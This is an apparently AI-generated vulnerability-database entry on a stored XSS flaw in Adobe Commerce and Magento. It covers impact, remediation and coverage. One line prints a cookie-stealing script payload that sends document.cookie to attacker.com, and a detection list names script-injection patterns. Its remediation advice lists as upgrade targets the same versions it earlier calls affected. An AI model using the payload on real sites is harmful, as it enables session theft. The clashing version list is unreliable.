
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21290 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the injected content, the malicious JavaScript executes in their browser, enabling session takeover. Affected versions include Adobe Commerce and Magento Open Source 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and all earlier versions; Adobe Commerce B2B is also affected across multiple versions. The vulnerability was disclosed on March 10–11, 2026, with a patch released simultaneously. It carries a CVSS v3.1 base score of 8.7 (High) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A low-privileged authenticated attacker can submit a crafted payload into a vulnerable form field within the Adobe Commerce admin or storefront interface; the application fails to properly sanitize or encode the input before storing and subsequently rendering it. When any user — including administrators — visits the page containing the malicious field, the injected JavaScript executes in their browser context with the scope changed (S:C), meaning the script can affect resources beyond the originating page. Exploitation requires user interaction (a victim must navigate to the affected page) but does not require elevated privileges beyond a basic authenticated account (Adobe Advisory).
Successful exploitation allows an attacker to hijack authenticated sessions (including administrator sessions), steal credentials, exfiltrate sensitive data, and modify page content visible to victims — resulting in high confidentiality and high integrity impact with no availability impact. In e-commerce environments, session takeover of an administrator account could enable an attacker to escalate privileges, modify product listings, access customer payment data, or install backdoors. The broad scope of affected versions across Adobe Commerce, Magento Open Source, and Commerce B2B significantly widens the potential attack surface (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent obfuscated variant to bypass basic filters.<script>, javascript:, onerror=, onload=, or Base64-encoded script content in input fields; admin activity logs showing actions performed from unfamiliar IP addresses or at unusual times following a page visit.Adobe has released patched versions addressing this vulnerability as documented in security bulletin APSB26-05. Users should upgrade to versions beyond the affected releases: Adobe Commerce 2.4.4-p16, 2.4.5-p15, 2.4.6-p13, 2.4.7-p8, 2.4.8-p3, and 2.4.9-alpha3 (apply the latest available patch for your branch). Additional hardening measures include implementing Content Security Policy (CSP) headers to restrict unauthorized script execution, enforcing server-side input validation and output encoding for all user-supplied data, and deploying a Web Application Firewall (WAF) with rules to detect and block XSS payloads (Adobe Advisory).
The vulnerability was covered as part of Adobe's broader March 2026 patch release, which addressed approximately 80 vulnerabilities across eight products, drawing attention from security news outlets and threat intelligence aggregators. CIS published an advisory noting that multiple Adobe product vulnerabilities could allow for arbitrary code execution in the broader patch batch. Community coverage on platforms such as Mastodon and Bluesky highlighted the stored XSS risk in e-commerce environments. No significant controversy or researcher-specific commentary specific to CVE-2026-21290 has been identified beyond standard patch-Tuesday reporting (CIS Advisory, The Hacker Wire).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."